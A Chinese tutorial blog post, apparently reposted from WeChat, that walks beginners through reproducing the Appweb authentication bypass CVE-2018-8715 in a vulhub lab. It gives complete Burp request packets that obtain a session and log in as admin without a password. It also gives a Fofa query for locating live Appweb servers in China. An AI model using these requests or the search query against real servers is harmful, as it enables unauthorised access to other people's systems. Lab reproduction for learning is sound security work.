最近可能会更新一些关于漏洞复现的文章,因为最近没事在找一些漏洞来复现,有新的有旧的,新手想要学习就可以看看我这里的复现文章,我文章中尽量写的从新手方面出发,同时文章中不涉及的我会给出链接让大家去学习。
ok,正文开始
受影响版本:7.0.3之前的版本
Fofa语句搜索:(注:fofa搜索可以快速让你在网上找到你想要的网站,百度fofa即可访问)
title="Appweb" && country="CN"
//没找到更好的,暂时凑合用
正文:
首先是运行靶场,这里使用的是vulhub靶场,启动的目录是./appweb/CVE-2018-8715
首先我们先cd到启动目录下然后:
启动命令:docker-compose up -d
关于vulhub靶场安装的方式可参考官网
https://vulhub.org/#/docs/
启动环境之后我们直接访问
http://192.168.0.110:8080/ //这里替换成你自己的靶机IP地址即可
利用这个漏洞我们首先要先知道一个用户名才行,靶场中的是admin
我们打开burp进行拦截,不需要输入密码,只输入用户名我们拦截(注:关于burp的基本使用,大家可以到csdn上搜索burp基本用法即可)
拦截到数据之后,然后我们按ctrl+r发送到重发器,重发器它的作用就是可以将抓到的数据反复发送得到回显,不需要重新抓包再修改不同的数据。
这个时候将左边的全部替换为下面的请求包
GET / HTTP/1.1 Host: example.com
Accept-Encoding: gzip, deflate Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Authorization: Digest username=admin
注:看图片中的格式,word中复制出的格式可能会有错,同时使用谷歌浏览器实验的话会有错,不太清楚原因,建议使用firefox
然后我们点击发送之后右边就会出现一个session,我们复制出来
-http-session-=8::http.session::146407b75b2ead88014f60850246044f
然后我们进行下一步,利用我们获取到的cookie,将这个复制出来的放到下面的数据包中红色地方
--**以下为数据包部分**--
POST / HTTP/1.1
Host: 192.168.0.110:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Authorization: Digest username=admin
-http-session-=8::http.session::146407b75b2ead88014f60850246044f
Upgrade-Insecure-Requests: 1
Content-Length: 18
username=admin
--**以上为数据包部分**--
将上面代码直接放到proxy中,将红色的地方改成你自己的IP和自己拿到的session
然后我们直接发送,这里不需要到重发器中,直接点击forword即可了。
完成了,我们这里成功登录了进去,复现完成
参考文章:
https://blog.csdn.net/YouthBelief/article/details/121072956
https://vulhub.org/#/environments/appweb/CVE-2018-8715/
原文始发于微信公众号(白安全组):实战AppWeb认证绕过漏洞(CVE-2018-8715)复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论